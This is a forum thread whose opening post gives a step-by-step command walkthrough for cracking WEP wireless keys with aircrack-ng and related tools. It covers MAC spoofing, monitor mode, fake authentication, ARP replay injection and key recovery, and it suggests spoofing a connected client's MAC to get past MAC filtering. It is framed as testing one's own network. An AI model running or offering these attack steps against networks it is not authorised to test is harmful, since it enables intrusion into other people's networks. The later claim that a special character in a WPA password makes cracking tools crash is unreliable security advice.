Cracking your own WEP Network to test security

[phpforfun]

This is a short tutorial showing you how to secure your own WEP network. First let me say, the only 100% sure way to secure your wireless network, is to disable wireless, but if you use it, then you cant.

What is WEP?
Wired Equivalent Privacy (WEP) is a security protocol for wireless networks that encrypts transmitted data . It's easy to configure. Without any security your data can be intercepted without difficulty.
Please do not confuse this with WPA, WPA is Wi-Fi Protected Access, a security standard for wireless networks. This requires a password, NOT a key.

1) Can you even do it?
First we need to be sure your wireless card can support packet injection. I used my Acer Aspire 5920. It comes with a 802. 11a/b/g WLAN Wireless card. It cant do packet injection. Thus I purchased the Hawking HWUG1 Wireless card. Hard to come by, but one of the best out there. Best buy has them for $40, give or take.

2) Install the software
Some people like to use BackTrack Live OS, which to me, is pointless, unless you dont want to install linux and use it as your everyday running operating system. You need 2 things to do this, macchanger, and aircrack-ng

Commands:
Make yourself the root user:

sudo -s

Install Aircrack

apt-get install aircrack-ng

Install macchanger

apt-get install macchanger

There! You have the 2 programs that make it easy to continue.

3) Verify you can use injection
Open the terminal, and type iwconfig. It will show you your network cards.

You will see I have 2 wireless cards. wlan0 and rausb0, wlan0 is what wont work, so we need to disable that, rausb0 is the wireless card I purchased.
Type the following command:

aireplay-ng --test rausb0

That will show the following result.

If it doesnt, you need to get a wireless card that works.

4) Spoof mac and put your wireless card into monitor mode
I will list the commands, and what they do. You dont NEED to spoof your mac, but it sure makes it a lot easier to remember.

We dont need wlan0, so lets disable it.

ifconfig wlan0 down

We need to disable rausb0 as well, so we can modify it

ifconfig rausb0 down

Change your mac (can be whatever you want as long as it looks like ##:##:##:##:##:##)

macchanger --mac 00:11:22:33:44:55 rausb0

The below commands are used for the hawking wireless card only, I believe they enable the drivers for the wireless card

modprobe -r rt73
modprobe rt73

Bring up rausb0 for use

ifconfig rausb0 up

Modify the bit rate of rausb0 to 1Mb/s

iwconfig rausb0 rate 1M

confirm the bit rate

iwconfig rausb0

Enable rausb0 for use

airmon-ng start rausb0

Here is a screenshot of me doing all of that (dont mind the typo)

You are now ready to begin!

5) Monitor the wireless networks around you, choose your target
Type the following command into your terminal

airodump-ng rausb0

This will monitor the wireless networks around you, as well as the stations connected to them.

You will notice the command will display pretty much everything you need. We will attack 2WIRE (my wireless lan). Notice its WEP, and its on channel 6. I have highlighted the BSSID.
NOTE: Looking at the screenshot, you will notice it shows the stations connected to BSSID's, this is why mac filtering is pointless, if they can connect, and you cant, spoof your mac to theres, and chances are it will let you in. If the station's connected BSSID is blank, that means hes looking or trying to connect to a BSSID, but has not yet.

6) Run Airodump-ng
Once you have selected your target, you can monitor the data packets it is sending out.
Type the below command into the terminal.

airodump-ng -c 6 -w 2wire --bssid 00:12:88:FE:7A:21 rausb0

-c will specify the channel the BSSID is on, 2WIRE is on 6
-w will write the packet data to a file, I chose to name the file 2wire
--bssid will specify the BSSID you are trying to connect to.
NOTE: LEAVE THIS RUNNING! Open a new terminal tab, and sudo -s again as admin

Notice how the Data column says 0? It will climb to 5000 to 10000 packets, if you cant even hit 5000, then your signal isnt good enough. This may take time, it can take anywhere from 2 minutes to 30 minutes. Be patient.

7) Fake Authentication with Access Point
Type the below command in the terminal

aireplay-ng -1 0 -a 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0

-a forces attack mode
-h is the host, that is your mac

The authentication must read successful in order for you to continue, I have had to run this command a few times to get it to be successful.

8) Run Aireplay with -3 (start aireplay-ng in ARP Request Replay Mode)

Type the below command into the terminal:

aireplay-ng -3 -b 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0

NOTE: Open a new tab again! Let this run as well!!


9) LAST STEP! Decrypt the packet data
if you go into the terminal and type "ls /home", you will see some .cap files, i named my log 2wire, thus it will be "2wire-01.cap"
Type the following command into the terminal:

aircrack-ng -n 64 --bssid 00:12:88:FE:7A:21 2wire-01.cap

Hope it has enough data to decrypt, if not, it will say please wait and try later.


SUCCESS!

[Zapper]

Interesting, +rep, I will try this later.

[phpforfun]

thanks!

[Jordan]

Excellent tutorial phpforfun, +rep.

What do you recommend for making your wireless network more secure?

[phpforfun]

Excellent tutorial phpforfun, +rep.

What do you recommend for making your wireless network more secure?

Great question, I should have posted that in the main post.

WPA, alpha numeric with a special character in it. The only program I know that can be used to crack WPA/WPA2 passwords, will crash if it has a special char put in the passwords list.

[Xav]

It depends on what you consider to be a special character. I consider the character "X" to be special, for instance.

[phpforfun]

It depends on what you consider to be a special character. I consider the character "X" to be special, for instance.

Glossary

Special Character . . . . . . . . .
A non-numeric character not in the a-z alphabet. Common examples include ~!@#$%^&* ()_+=-`';/.,?><:"|}{\ In the context of the required Special Character for Complex Passwords, it is recommended that you do not use: @, %, ^, &, {, ~, <, or punctuation marks (such as: !, ? , ., :, ;, ' ,", ,. )

You would be wrong.

[Xav]

I don't care what albany.edu says. I still consider the "X" character to be rather special.

[phpforfun]

Some people would say the same about you.

[Jordan]

And why is X special to you?

Posted via CodeCall Mobile